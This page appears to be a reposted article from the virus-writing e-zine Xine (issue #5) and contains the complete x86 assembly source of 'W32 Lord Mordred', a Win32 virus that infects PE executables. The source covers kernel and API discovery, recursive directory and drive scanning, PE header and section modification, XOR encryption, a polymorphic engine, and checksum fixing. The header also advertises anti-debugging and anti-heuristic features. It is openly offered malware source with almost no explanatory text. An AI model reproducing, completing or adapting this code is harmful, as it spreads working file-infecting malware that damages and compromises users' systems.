Copy Link
Add to Bookmark
Report
Xine - issue #5 - Phile 209
Ú-----------------------------¿
| Xine - issue #5 - Phile 209 |
À-----------------------------Ù
;--------------------- W32 LORD MORDRED BY HenKy ---------------------------;
; ;
;-AUTHOR: HenKy ;
; ;
;-MAIL: HenKy_@latinmail.com ;
; ;
;-ORIGIN: SPAIN ;
; ;
;-TARGET'S: PE EXE, ;
;-OS'S: W32 ;
;-PARASITIC YES ;
;-MULTIPARTITE NO ;
;-RESIDENT: YES ;
;-STEALTH: NO ;
;-THREADS: YES ;
;-KERNEL SEARCH: YES ;
;-API SEARCH: YES ;
;-ENCRYPTED: YES ;
;-POLYMORPHIC: YES (UNFINISHED) ;
;-METAMORPHIC: NO ;
;-ANTIDEBUGGER: YES ;
;-ANTITRACE: YES ;
;-ANTIEMULATOR: YES ;
;-ANTIDISASM: YES ;
;-ANTIHEURISTIC: YES ;
;-ANTIBAIT: YES ;
;-ERROR HANLING: YES ;
;-RETRO: YES ;
;-COMPRESSION: YES :
;-EPO: YES ;
;-ANTIWATCHDOGS: YES ;
;-CHECKSUM: YES ;
;-100% OWN CODE: YES ;
;-OPTIMIZATIONS: YES ;
;----------------------------------------------------------------------------;
; WELCOME TO THE LORD MORDRED... *^_^*
; MAY BE MY LAST VIRUS....
; IM TOO BORED TO FINISH IT ...
; MAYBE MAKE IT METAMORPHIC... ???
; ???
.586P
;PMMX
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MIX_SIZ EQU FILE_END-MEGAMIX
MIX_MEM EQU MEM_END-MEGAMIX
MARKA EQU 66
FLAGZ EQU 00000020H OR 20000000H OR 80000000H
MACROSIZE MACRO
DB MIX_SIZ/01000 MOD 10 + "0"
DB MIX_SIZ/00100 MOD 10 + "0"
DB MIX_SIZ/00010 MOD 10 + "0"
DB MIX_SIZ/00001 MOD 10 + "0"
ENDM
MACROMEM MACRO
DB MIX_MEM/01000 MOD 10 + "0"
DB MIX_MEM/00100 MOD 10 + "0"
DB MIX_MEM/00010 MOD 10 + "0"
DB MIX_MEM/00001 MOD 10 + "0"
ENDM
MACROHEAP MACRO
DB (MIX_MEM-MIX_SIZ)/01000 MOD 10 + "0"
DB (MIX_MEM-MIX_SIZ)/00100 MOD 10 + "0"
DB (MIX_MEM-MIX_SIZ)/00010 MOD 10 + "0"
DB (MIX_MEM-MIX_SIZ)/00001 MOD 10 + "0"
ENDM
.DATA
DB 'PHYSICAL SIZE = '
MACROSIZE
DB ' BYTES',0
DB 'VIRTUAL SIZE = '
MACROMEM
DB ' BYTES',0
DB 'CODE IN HEAP = '
MACROHEAP
DB ' BYTES',0
.CODE
FAKE:
CALL DELTA2
DELTA2: POP ESI
LEA ESI,[ESI+MEGAMIX-DELTA2]
SUB ESP,MIX_MEM
MOV EDI,ESP
PUSH MIX_MEM
POP ECX
REP MOVSB
LEA ECX,[ESP+TRICK]
MOV EAX,[ESP+MIX_MEM]
JMP ECX
ALIGN 4
MEGAMIX:
MOV EAX,[ESP+MIX_MEM-4]
TRICK EQU $-MEGAMIX
START:
CALL DELTA
DELTA: POP EBP
CALL CYPHERER
CRYPTOTRON:
XOR AX,AX
SZ:
CMP BYTE PTR [EAX],'M'
JZ F_GPA
SUB EAX,1000H
JMP SZ
F_GPA:
LEA ESI,[EBP+GPA_95-DELTA]
MOV EDI,EAX
PUSH EAX
BSWAP EAX
CMP AL,0BFH
JZ SCANIT
CMP AH,0F0H
JZ WNT
W2000:
ADD ESI,8
WNT:
ADD ESI,8
SCANIT:
MOV EDX,800000
SCANKRNL:
PUSH 8
POP ECX
PUSH ESI
PUSH EDI
REPZ CMPSB
POP EDI
POP ESI
JZ FOUND
INC EDI
DEC EDX
JZ WARNING
JMP SCANKRNL
FOUND:
INC EDI
INC EDI
INC EDI
MOV [EBP+GPA-DELTA], EDI
POP EBX
API_DECOMPRESSOR:
PUSHAD
LEA ESI, [EBP+APIs-DELTA]
LEA EDI, [EBP+APIBUFF-DELTA]
DEPACK:
PUSH 6
POP ECX
XOR EBX,EBX
LODSB
TEST AL,AL
JZ ZOPSB
CMP AL,'X'
JZ END_UN
CMP AL,9
JB LOADZ
ZOPSB: STOSB
JMP DEPACK
LOADZ:
PUSH ESI
LEA ESI,[EBP+API_TBL-DELTA]
CMP AL,1
JZ PUT_1
CMP AL,2
JZ PUT_2
CMP AL,3
JZ PUT_3
CMP AL,4
JZ PUT_4
CMP AL,5
JZ PUT_5
CMP AL,6
JZ PUT_6
CMP AL,7
JZ PUT_7
PUT_8:
PUSH 11
POP ECX
PUSH 32
POP EBX
JMP BOCOI
PUT_7: PUSH 26
POP EBX
JMP BOCOI
PUT_6: PUSH 3
POP ECX
PUSH 23
POP EBX
JMP BOCOI
PUT_5: PUSH 3
POP ECX
PUSH 20
POP EBX
JMP BOCOI
PUT_4: PUSH 14
POP EBX
JMP BOCOI
PUT_3: PUSH 4
POP ECX
PUSH 10
POP EBX
JMP BOCOI
PUT_2: PUSH ECX
POP EBX
PUSH 4
POP ECX
JMP BOCOI
PUT_1:
BOCOI:
ADD ESI,EBX
REP MOVSB
POP ESI
JMP DEPACK
END_UN: STOSB
POPAD
LEA ESI, [EBP+APIBUFF-DELTA]
LEA EDI, [EBP+APIaddresses-DELTA]
GPI: PUSH ESI
PUSH EBX
CALL [EBP+GPA-DELTA]
CLD
STOSD
NPI:
LODSB
TEST AL, AL
JNZ SHORT NPI
CMP [ESI], AL
JNZ GPI
THREAD_C:
;PUSH -2
;PUSH -2
;CALL DWORD PTR [EBP+SetThreadPriority-DELTA]
;CDQ
;LEA EAX,[EBP+THR-DELTA]
;PUSH EAX
;PUSH EDX
;PUSH EDX
;LEA EAX,[EBP+WARNING-DELTA]
;PUSH EAX
;PUSH EDX
;PUSH EDX
;CALL DWORD PTR [EBP+CreateThread-DELTA]
;CALL DELAY
BUCLE:
CALL INFECT
PUSH 8
POP ECX
SLOOP:
PUSH ECX
LEA EDX, [EBP+DRIV-DELTA]
INC BYTE PTR [EDX]
CALL SCANNER
POP ECX
LOOP SLOOP
MOV BYTE PTR [EBP+DRIV-DELTA],'B'
;JMP BUCLE
WARNING:
MOV EDI,12345678H
ZONE EQU $-4
ADD ESP,(MIX_MEM-4)
PUSH EDI
MOV ESI,12345678H
BASS EQU $-4
PUSH POLY_SIZ/4
POP ECX
REP MOVSD
MOV AL,BYTE PTR [EBP+LLAVE-DELTA]
PUSH POLY_SIZ
POP ECX
POP EDI
PUSH EDI
POK@:
XOR BYTE PTR [EDI],AL
INC EDI
LOOP POK@
RET
DRIV DB 'B:\',0
INFECT:
;CALL DELAY
LEA EAX, [EBP+OFFSET Win32FindData-DELTA]
PUSH EAX
LEA EAX, [EBP+OFFSET IMASK-DELTA]
PUSH EAX
CALL DWORD PTR [EBP+FindFirstFile-DELTA]
MOV DWORD PTR [EBP+SearcHandle-DELTA],EAX
LOOPER:
INC EAX
JZ RETOX
DEC EAX
TEST EAX,EAX
JNZ ALLKEY
RETOX:
RET
ALLKEY:
PUSH DWORD PTR [EBP+BASS-DELTA]
PUSH DWORD PTR [EBP+ZONE-DELTA]
PUSH DWORD PTR [EBP+LLAVE-DELTA]
LEA EBX ,[EBP+offset FNAME-DELTA] ; OPEN IT!
MOV EAX, DWORD PTR [EBP+WFD_dwFileAttributes-DELTA]
AND AL, NOT 00000001b
PUSH EAX
PUSH EBX
CALL DWORD PTR [EBP+SetFileAttributesA-DELTA]
CDQ
PUSH EDX
PUSH 80h
PUSH 3
PUSH EDX
PUSH EDX
PUSH 0C0000000h
PUSH EBX
CALL DWORD PTR [EBP+CreateFile-DELTA]
INC EAX
JZ Cerrar
DEC EAX
MOV DWORD PTR [EBP+FileHandle-DELTA],EAX ; SAVE HNDL
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CDQ
PUSH EDX
PUSH ECX
PUSH EDX
PUSH 4H
PUSH EDX
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CreateFileMappingA-DELTA]
TEST EAX,EAX
JNZ CONTNUE
Cerrar:
POP DWORD PTR [EBP+LLAVE-DELTA]
POP DWORD PTR [EBP+ZONE-DELTA]
POP DWORD PTR [EBP+BASS-DELTA]
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CloseHandle-DELTA]
LEA EAX, [EBP+offset Win32FindData-DELTA]
PUSH EAX
PUSH DWORD PTR [EBP+SearcHandle-DELTA]
CALL DWORD PTR [EBP+FindNextFile-DELTA]
JMP LOOPER
CONTNUE:
MOV DWORD PTR [EBP+MapHandle-DELTA],EAX
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CDQ
PUSH ECX
PUSH EDX
PUSH EDX
INC EDX
INC EDX
PUSH EDX
PUSH DWORD PTR [EBP+MapHandle-DELTA]
CALL DWORD PTR [EBP+MapViewOfFile-DELTA]
TEST EAX,EAX
JZ Cerrar
MOV DWORD PTR [EBP+MapAddress-DELTA],EAX
MOV ESI,EAX ; GET PE HDR
MOV ESI,[EAX+3CH]
ADD ESI,EAX
CMP BYTE PTR [ESI],"P" ; IS A 'P'E ?
JNZ Cerrar
MOV EDI,ESI
MOV EBX,[ESI+74H]
SHL EBX,3 ; MAKE FIRST SECTION WRITEABLE
ADD ESI,78H
ADD ESI,EBX
OR DWORD PTR [ESI+24H],FLAGZ
MOV EDX,[ESI+12]
SUB EDX,[ESI+20]
MOV DWORD PTR [EBP+SUBBER-DELTA],EDX
MOV EAX,[ESI+8]
ADD EAX,[ESI+12]
MOV DWORD PTR [EBP+SIZO-DELTA],EAX
MOV EBX,[EDI+28H]
MOV EAX,12345678H
SIZO EQU $-4
CMP EAX,EBX
JB Cerrar
CMP BYTE PTR [EDI+MARKA],"H" ; HenKy IS HERE ?
JZ Cerrar
XOR ECX,ECX
MOV CL,BYTE PTR [EDI+6]
PUSH ESI
SERCH:
CMP DWORD PTR [ESI],"ler."
JZ NIZE
ADD ESI,40
LOOP SERCH
POP ESI
JMP Cerrar
NIZE:
POP ECX
MOV ECX,[EDI+3CH]
MOV EBX,[EDI+56]
CMP ECX,EBX
JNZ NIXX
CDQ
MOV [EBP+SUBBER-DELTA],EDX
NIXX:
MOV DWORD PTR [ESI],"adr."
MOV WORD PTR [ESI+4],"at"
CMP DWORD PTR [ESI+8],MIX_SIZ
JB Cerrar
MOV EAX,[ESI+20]
MOV DWORD PTR [EBP+NEW_EIP-DELTA],EAX
MOV EAX,[ESI+12] ; RVA
ADD EAX,[EDI+34H] ; IMAGE BASE
MOV [EBP+BASS-DELTA],EAX
OKA:
PUSHAD ; SAVE OLD DATA
MOV ESI,[EDI+28H]
ADD ESI,[EDI+34H]
MOV [EBP+ZONE-DELTA],ESI
SUB ESI,[EDI+34H]
SUB ESI,12345678h
SUBBER EQU $-4
ADD ESI,DWORD PTR [EBP+MapAddress-DELTA]
PUSHAD
RD:
DB 0FH,31H
CMP AL,0
JE RD
MOV BYTE PTR [EBP+LLAVE-DELTA],AL
PUSH POLY_SIZ
POP ECX
PO@:
XOR BYTE PTR [ESI],AL
INC ESI
LOOP PO@
POPAD
MOV EDI,12345678H
NEW_EIP EQU $-4
ADD EDI,DWORD PTR [EBP+MapAddress-DELTA]
PUSH POLY_SIZ/4
POP ECX
REP MOVSD
POPAD
CALL ENGINE
PUSHAD
MOV BYTE PTR [EDI+MARKA],"H" ; HenKy RULEEZZ
MOV EDI,[EDI+28H]
ADD EDI,DWORD PTR [EBP+MapAddress-DELTA]
SUB EDI,DWORD PTR [EBP+SUBBER-DELTA]
LEA ESI,[EBP+POLYBUFF-DELTA] ; COPY NEW DATA
PUSH POLY_SIZ/4
POP ECX
REP MOVSD
POPAD
CDQ
CMP DWORD PTR [EDI+58H], EDX
JZ UnMapFile
MOV DWORD PTR [EDI+58H], EDX
MOV ESI, [EBP+MapAddress-DELTA]
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
SHR ECX, 1
CHK_LOOP:
MOVZX EAX, WORD PTR [ESI]
ADD EDX, EAX
MOV EAX, EDX
AND EDX, 0FFFFh
SHR EAX, 16
ADD EDX, EAX
INC ESI
INC ESI
LOOP CHK_LOOP
MOV EAX, EDX
SHR EAX, 16
ADD AX, DX
ADD EAX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
MOV DWORD PTR [EDI+58H], EAX
UnMapFile:
PUSH DWORD PTR [EBP+MapAddress-DELTA]
CALL DWORD PTR [EBP+UnmapViewOfFile-DELTA]
CloseMap:
PUSH DWORD PTR [EBP+MapHandle-DELTA]
CALL DWORD PTR [EBP+CloseHandle-DELTA]
JMP Cerrar
DELAY:
;PUSH 10000
;CALL DWORD PTR [EBP+Sleep-DELTA]
;RET
SET_DIR:
PUSH EDX
CALL [EBP+SetCurrentDirectory-DELTA]
;CALL DELAY
RET
SCANNER:
CALL SET_DIR
RECURSIVE:
CALL INFECT
LEA EAX, [EBP+Win32FindData-DELTA]
PUSH EAX
LEA EAX, [EBP+DIR2-DELTA]
PUSH EAX
CALL [EBP+FindFirstFile-DELTA]
MOV EDI, EAX
INC EAX
JZ NOMORE
PROCESS:
LEA EAX, [EBP+WFD_dwFileAttributes-DELTA]
MOV AL, [EAX]
CMP AL, 10H
JNE NEXT
LEA EDX, [EBP+FNAME-DELTA]
CMP BYTE PTR [EDX], '.'
JE NEXT
CALL SET_DIR
PUSH EDI
LEA EDX, [EBP+FNAME-DELTA]
CALL RECURSIVE
POP EDI
LEA EDX, [EBP+PDIR-DELTA]
CALL SET_DIR
NEXT:
LEA EAX, [EBP+Win32FindData-DELTA]
PUSH EAX
PUSH EDI
CALL [EBP+FindNextFile-DELTA]
OR EAX, EAX
JNZ PROCESS
NOMORE:
RET
CRYPT_SIZ EQU $-CRYPTOTRON
;---------------------------------------------------------------------------;
; POLYMORPHIC ENGINE STARTS HERE ;
;---------------------------------------------------------------------------;
ENGINE:
PUSHAD
DB 0FH,31H
MOV BYTE PTR [EBP+KEY-DELTA],AL
CALL CYPHERER
LEA ESI,[EBP+FILE_END-DELTA]
LEA EDI,[EBP+POLYBUFF-DELTA]
PUSH ESI
LEA ESI,[EBP+FIX-DELTA]
MOV ECX,FIX_SIZ
REP MOVSB
POP ESI
MOV ECX,((MIX_SIZ/4)-1)
LLOP:
SUB ESI,8
MOV AL,'h'
STOSB
MOVSD
JMP GARBAHE
@L:
LOOP LLOP
MOV AX,0E4FFH
STOSW
CALL CYPHERER
POPAD
RET
GARBAHE:
PUSH ESI
LEA ESI,[EBP+ONE_BYTERS-DELTA]
BAHE:
DB 0FH,31H
ADD AL,AH
CMP AL,10
JAE BAHE
XOR AH,AH
BSWAP EAX
XOR AX,AX
BSWAP EAX
ADD ESI,EAX
LODSD
STOSD
POP ESI
JMP @L
CYPHERER:
PUSH EBP
MOV ECX,CRYPT_SIZ
ADD EBP,(CRYPTOTRON-DELTA)
CALL CRP
ADD EBP,NO_ME_RAYES
MOV ECX,(FILE_END-APIs)
CALL CRP
POP EBP
RET
CRP:
XOR BYTE PTR [EBP],0
KEY EQU $-1
INC EBP
LOOP CRP
RET
ONE_BYTERS:
DB 040H,041H,042H,043H,045H,046H,047H
DB 048H,049H,04AH,04BH,04DH,04EH,04FH
DB 090H,091H,092H,093H,094H,095H,096H
DB 027H,02FH,03FH,0D4H,0D5H,0ECH,09FH
DB 098H,099H,09EH,0F8H,0F9H,0FCH,0FDH
DB 0F5H,097H,90H,90H,90H
FIX:
SUB ESP,(MIX_MEM-MIX_SIZ)
FIX_SIZ EQU $-FIX
NO_ME_RAYES EQU $-ENGINE
;Create = 01H
;File = 02H
;Find = 03H
;ViewOf = 04H
;Map = 05H
;Set = 06H
;Thread = 07H
;AttributesA = 08H
APIs:
DB 01H,02H,"A",0
DB "CloseHandle",0
DB 03H,"First",02H,"A",0
DB 03H,"Next",02H,"A",0
DB "Read",02H,0
DB 05H,04H,02H,0
DB "Unmap",04H,02H,0
DB 01H,02H,05H,"pingA",0
DB 06H,"CurrentDirectoryA",0
DB 01H,07H,0
DB 06H,07H,"Priority",0
DB "Sleep",0
DB 06H,02H,08H,0
Zero_ DB 0
DB "X"
APIX_SIZ EQU $-APIs
API_TBL:
DB "Create" ; 6
DB "File" ; 4
DB "Find" ; 4
DB "ViewOf" ; 6
DB "Map" ; 3
DB "Set" ; 3
DB "Thread" ; 6
DB "AttributesA" ;11
GPA_95 DB 0C2H,04H,00H,57H,6AH,22H,2Bh,0D2H
GPA_NT DB 0C2H,04H,00H,55H,8Bh,4CH,24H,0CH
GPA_2KB DB 48H,03H,00H,55H,8Bh,0ECh,51H,51H
;GPA_2K DB 00FH,00H,00H,55H,8Bh,0ECh,51H,51H
IMASK DB "*.ZZZ",0
DIR2 DB "*.",0
PDIR DB "..",0
LLAVE DB 0
DB 'LORD MORDRED by HenKy'
DB 4 DUP (0)
ALIGN 4
FILE_END LABEL BYTE
APIaddresses:
CreateFile DD 0
CloseHandle DD 0
FindFirstFile DD 0
FindNextFile DD 0
ReadFile DD 0
MapViewOfFile DD 0
UnmapViewOfFile DD 0
CreateFileMappingA DD 0
SetCurrentDirectory DD 0
CreateThread DD 0
SetThreadPriority DD 0
Sleep DD 0
SetFileAttributesA DD 0
THR DD 0
GPA DD 0
SearcHandle DD 0
FileHandle DD 0
MapHandle DD 0
MapAddress DD 0
APIBUFF DB APIX_SIZ DUP (0)
POLYBUFF DB (2*(FILE_END-MEGAMIX) + ((FILE_END-MEGAMIX)/4)) DUP (0)
POLY_SIZ EQU $-APIBUFF
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
Win32FindData:
WFD_dwFileAttributes DD 0
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD 0
WFD_nFileSizeLow DD 0
WFD_dwReserved0 DD 0
WFD_dwReserved1 DD 0
FNAME DB 260H DUP (0)
MEM_END LABEL BYTE
EXITPROC:
PUSH 0
CALL ExitProcess
ENDS
END FAKE